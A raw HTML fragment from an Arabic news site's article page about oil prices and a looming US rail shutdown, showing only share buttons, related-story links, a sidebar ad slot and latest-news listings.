class="item-title">Facebook</span></a></span><span class="social-item twitter has-title"><a href="https://twitter.com/share?text=ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا @mustaqilaiq&url=https%3A%2F%2Fwp.me%2Fp3Hg40-2aBS" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-twitter','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-twitter"></i></span><span class="item-title">Twitter</span></a></span></div>		</div>
										</article>
									<section class="next-prev-post clearfix">

					<div class="prev-post">
				<p class="pre-title heading-typo"><i
							class="fa fa-arrow-right"></i> المقال السابق				</p>
				<p class="title heading-typo"><a href="https://mustaqila.com/%d9%85%d8%a7%d9%83%d8%b1%d9%88%d9%86-%d9%88%d8%a7%d9%84%d8%b9%d8%a7%d9%87%d9%84-%d8%a7%d9%84%d8%a7%d8%b1%d8%af%d9%86%d9%8a-%d9%8a%d8%af%d8%b9%d9%88%d8%a7%d9%86-%d9%84%d8%b9%d9%82%d8%af-%d9%85%d8%a4/" rel="prev">ماكرون والعاهل الاردني يدعوان لعقد مؤتمر عاجل حول الشرق الأوسط</a></p>
			</div>
		
					<div class="next-post">
				<p class="pre-title heading-typo">المقال التالي <i
							class="fa fa-arrow-left"></i></p>
				<p class="title heading-typo"><a href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/" rel="next">شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا</a></p>
			</div>
		
	</section>
							</div>
							<div class="post-related">

	<div class="section-heading sh-t2 sh-s3 ">

					<span class="h-text related-posts-heading">اقرأ المزيد</span>
		
	</div>

	
					<div class="bs-pagination-wrapper main-term-none  ">
			<div class="listing listing-thumbnail listing-tb-2 clearfix  scolumns-3 simple-grid">
	<div  class="post-517469 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="استطلاع : نسبة الانفاق على الهاتف النقال تتجاوز 20 الف دينار للفرد" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/download-2-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;download-2-86x64.jpg&quot;,&quot;210&quot;:&quot;download-2-210x136.jpg&quot;,&quot;279&quot;:&quot;download-2-279x220.jpg&quot;,&quot;357&quot;:&quot;download-2-357x210.jpg&quot;,&quot;750&quot;:&quot;download-2-750x430.jpg&quot;,&quot;768&quot;:&quot;download-2.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%a7%d8%b3%d8%aa%d8%b7%d9%84%d8%a7%d8%b9-%d9%86%d8%b3%d8%a8%d8%a9-%d8%a7%d9%84%d8%a7%d9%86%d9%81%d8%a7%d9%82-%d8%b9%d9%84%d9%89-%d8%a7%d9%84%d9%87%d8%a7%d8%aa%d9%81-%d8%a7%d9%84%d9%86%d9%82%d8%a7/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%a7%d8%b3%d8%aa%d8%b7%d9%84%d8%a7%d8%b9-%d9%86%d8%b3%d8%a8%d8%a9-%d8%a7%d9%84%d8%a7%d9%86%d9%81%d8%a7%d9%82-%d8%b9%d9%84%d9%89-%d8%a7%d9%84%d9%87%d8%a7%d8%aa%d9%81-%d8%a7%d9%84%d9%86%d9%82%d8%a7/" title="استطلاع : نسبة الانفاق على الهاتف النقال تتجاوز 20 الف دينار للفرد">
			<span class="post-title">
				استطلاع : نسبة الانفاق على الهاتف النقال تتجاوز 20 الف دينار للفرد			</span>
	</a>
	</p></div>
</div >
<div  class="post-517454 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/6321eb3042360418e005130d-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;6321eb3042360418e005130d-86x64.jpg&quot;,&quot;210&quot;:&quot;6321eb3042360418e005130d-210x136.jpg&quot;,&quot;279&quot;:&quot;6321eb3042360418e005130d-279x220.jpg&quot;,&quot;357&quot;:&quot;6321eb3042360418e005130d-357x210.jpg&quot;,&quot;750&quot;:&quot;6321eb3042360418e005130d-750x430.jpg&quot;,&quot;768&quot;:&quot;6321eb3042360418e005130d.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/" title="شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا">
			<span class="post-title">
				شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا			</span>
	</a>
	</p></div>
</div >
<div  class="post-517450 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-21593">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-21593"><a href="https://mustaqila.com/jordan/">اخبار الاردن</a></span></div>			<a  title="ماكرون والعاهل الاردني يدعوان لعقد مؤتمر عاجل حول الشرق الأوسط" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/632271a34236040a6352fc45-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;632271a34236040a6352fc45-86x64.jpg&quot;,&quot;210&quot;:&quot;632271a34236040a6352fc45-210x136.jpg&quot;,&quot;279&quot;:&quot;632271a34236040a6352fc45-279x220.jpg&quot;,&quot;357&quot;:&quot;632271a34236040a6352fc45-357x210.jpg&quot;,&quot;750&quot;:&quot;632271a34236040a6352fc45-750x430.jpg&quot;,&quot;768&quot;:&quot;632271a34236040a6352fc45.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d9%85%d8%a7%d9%83%d8%b1%d9%88%d9%86-%d9%88%d8%a7%d9%84%d8%b9%d8%a7%d9%87%d9%84-%d8%a7%d9%84%d8%a7%d8%b1%d8%af%d9%86%d9%8a-%d9%8a%d8%af%d8%b9%d9%88%d8%a7%d9%86-%d9%84%d8%b9%d9%82%d8%af-%d9%85%d8%a4/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d9%85%d8%a7%d9%83%d8%b1%d9%88%d9%86-%d9%88%d8%a7%d9%84%d8%b9%d8%a7%d9%87%d9%84-%d8%a7%d9%84%d8%a7%d8%b1%d8%af%d9%86%d9%8a-%d9%8a%d8%af%d8%b9%d9%88%d8%a7%d9%86-%d9%84%d8%b9%d9%82%d8%af-%d9%85%d8%a4/" title="ماكرون والعاهل الاردني يدعوان لعقد مؤتمر عاجل حول الشرق الأوسط">
			<span class="post-title">
				ماكرون والعاهل الاردني يدعوان لعقد مؤتمر عاجل حول الشرق الأوسط			</span>
	</a>
	</p></div>
</div >
<div  class="post-517447 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="وزير الدفاع الامريكي : نعتزم حماية اليابان من التهديدات المحتملة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/1607401835241-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;1607401835241-86x64.jpg&quot;,&quot;210&quot;:&quot;1607401835241-210x136.jpg&quot;,&quot;279&quot;:&quot;1607401835241-279x220.jpg&quot;,&quot;357&quot;:&quot;1607401835241-357x210.jpg&quot;,&quot;685&quot;:&quot;1607401835241.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d9%88%d8%b2%d9%8a%d8%b1-%d8%a7%d9%84%d8%af%d9%81%d8%a7%d8%b9-%d8%a7%d9%84%d8%a7%d9%85%d8%b1%d9%8a%d9%83%d9%8a-%d9%86%d8%b9%d8%aa%d8%b2%d9%85-%d8%ad%d9%85%d8%a7%d9%8a%d8%a9-%d8%a7%d9%84%d9%8a%d8%a7/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d9%88%d8%b2%d9%8a%d8%b1-%d8%a7%d9%84%d8%af%d9%81%d8%a7%d8%b9-%d8%a7%d9%84%d8%a7%d9%85%d8%b1%d9%8a%d9%83%d9%8a-%d9%86%d8%b9%d8%aa%d8%b2%d9%85-%d8%ad%d9%85%d8%a7%d9%8a%d8%a9-%d8%a7%d9%84%d9%8a%d8%a7/" title="وزير الدفاع الامريكي : نعتزم حماية اليابان من التهديدات المحتملة">
			<span class="post-title">
				وزير الدفاع الامريكي : نعتزم حماية اليابان من التهديدات المحتملة			</span>
	</a>
	</p></div>
</div >
<div  class="post-517440 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/469E138C-6D76-4A57-A9E4-713858799459-210x136.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-86x64.jpeg&quot;,&quot;210&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-210x136.jpeg&quot;,&quot;279&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-279x220.jpeg&quot;,&quot;357&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-357x210.jpeg&quot;,&quot;750&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-750x430.jpeg&quot;,&quot;2048&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459.jpeg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d9%85%d8%a7%d9%86%d8%b4%d8%b3%d8%aa%d8%b1-%d8%b3%d9%8a%d8%aa%d9%8a-%d9%8a%d9%86%d9%8f%d8%ac%d8%b2-%d9%85%d9%87%d9%85%d8%a9-%d8%af%d9%88%d8%b1%d8%aa%d9%85%d9%88%d9%86%d8%af-%d8%a8%d9%86%d8%ac%d8%a7/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d9%85%d8%a7%d9%86%d8%b4%d8%b3%d8%aa%d8%b1-%d8%b3%d9%8a%d8%aa%d9%8a-%d9%8a%d9%86%d9%8f%d8%ac%d8%b2-%d9%85%d9%87%d9%85%d8%a9-%d8%af%d9%88%d8%b1%d8%aa%d9%85%d9%88%d9%86%d8%af-%d8%a8%d9%86%d8%ac%d8%a7/" title="مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند">
			<span class="post-title">
				مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند			</span>
	</a>
	</p></div>
</div >
<div  class="post-517437 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="ثنائية فالفيردي وأسينسيو تقود ريال مدريد للانتصار على لايبزيج في دوري الأبطال" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-210x136.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-86x64.jpeg&quot;,&quot;210&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-210x136.jpeg&quot;,&quot;279&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-279x220.jpeg&quot;,&quot;357&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-357x210.jpeg&quot;,&quot;750&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-750x430.jpeg&quot;,&quot;1080&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7.jpeg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%ab%d9%86%d8%a7%d8%a6%d9%8a%d8%a9-%d9%81%d8%a7%d9%84%d9%81%d9%8a%d8%b1%d8%af%d9%8a-%d9%88%d8%a3%d8%b3%d9%8a%d9%86%d8%b3%d9%8a%d9%88-%d8%aa%d9%82%d9%88%d8%af-%d8%b1%d9%8a%d8%a7%d9%84-%d9%85%d8%af/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%ab%d9%86%d8%a7%d8%a6%d9%8a%d8%a9-%d9%81%d8%a7%d9%84%d9%81%d9%8a%d8%b1%d8%af%d9%8a-%d9%88%d8%a3%d8%b3%d9%8a%d9%86%d8%b3%d9%8a%d9%88-%d8%aa%d9%82%d9%88%d8%af-%d8%b1%d9%8a%d8%a7%d9%84-%d9%85%d8%af/" title="ثنائية فالفيردي وأسينسيو تقود ريال مدريد للانتصار على لايبزيج في دوري الأبطال">
			<span class="post-title">
				ثنائية فالفيردي وأسينسيو تقود ريال مدريد للانتصار على لايبزيج في دوري الأبطال			</span>
	</a>
	</p></div>
</div >
	</div>
	
	</div></div>
<section id="comments-template-517444" class="comments-template">
	
	
	<p class="comments-closed">
		التعليقات مغلقة.	</p><!-- .comments-closed -->


	</section>
						</div><!-- .content-column -->
												<div class="col-sm-4 sidebar-column sidebar-column-primary">
							<aside id="sidebar-primary-sidebar" class="sidebar" role="complementary" aria-label="Primary Sidebar Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
	<div id="text-16" class=" h-ni w-nt primary-sidebar-widget widget widget_text">			<div class="textwidget"><p><br />
<!-- NewsDetails_side --><br />
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-1920816103235815"
     data-ad-slot="2024752632"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins><br />
</p>
</div>
		</div><div id="bs-thumbnail-listing-1-3" class=" h-ni bs-hidden-xs w-t primary-sidebar-widget widget widget_bs-thumbnail-listing-1"><div class=" bs-listing bs-listing-listing-thumbnail-1 bs-listing-single-tab">		<p class="section-heading sh-t2 sh-s3 main-term-83">

		
							<a href="https://mustaqila.com/last/" class="main-link">
							<span class="h-text main-term-83">
								 كل الاخبار							</span>
				</a>
			
		
		</p>
			<div class="listing listing-thumbnail listing-tb-1 clearfix columns-1">
		<div class="post-517481 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/DSC00395-e1663236284782-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;DSC00395-e1663236284782-86x64.jpg&quot;,&quot;210&quot;:&quot;DSC00395-e1663236284782-210x136.jpg&quot;,&quot;951&quot;:&quot;DSC00395-e1663236284782.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/517481-2/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/517481-2/" class="post-url post-title">
					</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T13:05:51+03:00">سبتمبر 15, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-517478 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="دراسة : الشباب المقدسي الأكثر تعليما مقارنة بباقي الفلسطينيين" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/qds-86x64.png" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;qds-86x64.png&quot;,&quot;210&quot;:&quot;qds-210x136.png&quot;,&quot;684&quot;:&quot;qds.png&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%af%d8%b1%d8%a7%d8%b3%d8%a9-%d8%a7%d9%84%d8%b4%d8%a8%d8%a7%d8%a8-%d8%a7%d9%84%d9%85%d9%82%d8%af%d8%b3%d9%8a-%d8%a7%d9%84%d8%a3%d9%83%d8%ab%d8%b1-%d8%aa%d8%b9%d9%84%d9%8a%d9%85%d8%a7-%d9%85%d9%82/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%af%d8%b1%d8%a7%d8%b3%d8%a9-%d8%a7%d9%84%d8%b4%d8%a8%d8%a7%d8%a8-%d8%a7%d9%84%d9%85%d9%82%d8%af%d8%b3%d9%8a-%d8%a7%d9%84%d8%a3%d9%83%d8%ab%d8%b1-%d8%aa%d8%b9%d9%84%d9%8a%d9%85%d8%a7-%d9%85%d9%82/" class="post-url post-title">
			دراسة : الشباب المقدسي الأكثر تعليما مقارنة بباقي الفلسطينيين		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T12:55:42+03:00">سبتمبر 15, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-517475 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-17579">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="لسه الاوان تجمع محمد سرور ولايف ستايلز ستوديوز" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/thumbnail-2-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;thumbnail-2-86x64.jpg&quot;,&quot;210&quot;:&quot;thumbnail-2-210x136.jpg&quot;,&quot;1080&quot;:&quot;thumbnail-2.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%84%d8%b3%d9%87-%d8%a7%d9%84%d8%a7%d9%88%d8%a7%d9%86-%d8%aa%d8%ac%d9%85%d8%b9-%d9%85%d8%ad%d9%85%d8%af-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d9%84%d8%a7%d9%8a%d9%81-%d8%b3%d8%aa%d8%a7%d9%8a%d9%84%d8%b2/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%84%d8%b3%d9%87-%d8%a7%d9%84%d8%a7%d9%88%d8%a7%d9%86-%d8%aa%d8%ac%d9%85%d8%b9-%d9%85%d8%ad%d9%85%d8%af-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d9%84%d8%a7%d9%8a%d9%81-%d8%b3%d8%aa%d8%a7%d9%8a%d9%84%d8%b2/" class="post-url post-title">
			لسه الاوان تجمع محمد سرور ولايف ستايلز ستوديوز		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T12:52:06+03:00">سبتمبر 15, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-517469 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="استطلاع : نسبة الانفاق على الهاتف النقال تتجاوز 20 الف دينار للفرد" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/download-2-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;download-2-86x64.jpg&quot;,&quot;210&quot;:&quot;download-2-210x136.jpg&quot;,&quot;768&quot;:&quot;download-2.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d8%b3%d8%aa%d8%b7%d9%84%d8%a7%d8%b9-%d9%86%d8%b3%d8%a8%d8%a9-%d8%a7%d9%84%d8%a7%d9%86%d9%81%d8%a7%d9%82-%d8%b9%d9%84%d9%89-%d8%a7%d9%84%d9%87%d8%a7%d8%aa%d9%81-%d8%a7%d9%84%d9%86%d9%82%d8%a7/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d8%b3%d8%aa%d8%b7%d9%84%d8%a7%d8%b9-%d9%86%d8%b3%d8%a8%d8%a9-%d8%a7%d9%84%d8%a7%d9%86%d9%81%d8%a7%d9%82-%d8%b9%d9%84%d9%89-%d8%a7%d9%84%d9%87%d8%a7%d8%aa%d9%81-%d8%a7%d9%84%d9%86%d9%82%d8%a7/" class="post-url post-title">
			استطلاع : نسبة الانفاق على الهاتف النقال تتجاوز 20 الف دينار للفرد		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:46:01+03:00">سبتمبر 15, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-517454 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/6321eb3042360418e005130d-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;6321eb3042360418e005130d-86x64.jpg&quot;,&quot;210&quot;:&quot;6321eb3042360418e005130d-210x136.jpg&quot;,&quot;768&quot;:&quot;6321eb3042360418e005130d.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/" class="post-url post-title">
			شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:35:36+03:00">سبتمبر 15, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-517444 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/oil-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;oil-86x64.jpg&quot;,&quot;210&quot;:&quot;oil-210x136.jpg&quot;,&quot;1194&quot;:&quot;oil.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a7%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d9%86%d9%81%d8%b7-%d8%a8%d8%b3%d8%a8%d8%a8-%d8%aa%d9%88%d9%82%d9%81-%d9%88%d8%b4%d9%8a%d9%83-%d9%84%d9%84%d8%b3%d9%83/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a7%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d9%86%d9%81%d8%b7-%d8%a8%d8%b3%d8%a8%d8%a8-%d8%aa%d9%88%d9%82%d9%81-%d9%88%d8%b4%d9%8a%d9%83-%d9%84%d9%84%d8%b3%d9%83/" class="post-url post-title">
			ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:31:51+03:00">سبتمبر 15, 2022</time></span>
						</div>
			</div>
	</div >
	</div>
	</div></div></aside>
						</div><!-- .primary-sidebar-column -->
									</div><!-- .main-section -->
		</div><!-- .layout-2-col -->

	</main><!-- main -->
	</div><!-- .content-wrap -->
<div class='bs-injection bs-injection-post_before_footer bs-injection-2-col bs-vc-content'><div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-12 vc_hidden-lg vc_hidden-md vc_hidden-sm"><div class="bs-vc-wrapper wpb_wrapper"><div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">		<p class="section-heading sh-t2 sh-s3 main-term-none">

		
							<span class="h-text main-term-none main-link">
						المزيد من الاخبار					</span>
			
		
		</p>
			<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517481 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/DSC00395-e1663236284782-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;DSC00395-e1663236284782-210x136.jpg&quot;,&quot;279&quot;:&quot;DSC00395-e1663236284782-279x220.jpg&quot;,&quot;357&quot;:&quot;DSC00395-e1663236284782-357x210.jpg&quot;,&quot;750&quot;:&quot;DSC00395-e1663236284782-750x430.jpg&quot;,&quot;951&quot;:&quot;DSC00395-e1663236284782.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/517481-2/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/517481-2/" class="post-title post-url">
					</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T13:05:51+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517475 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-17579 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
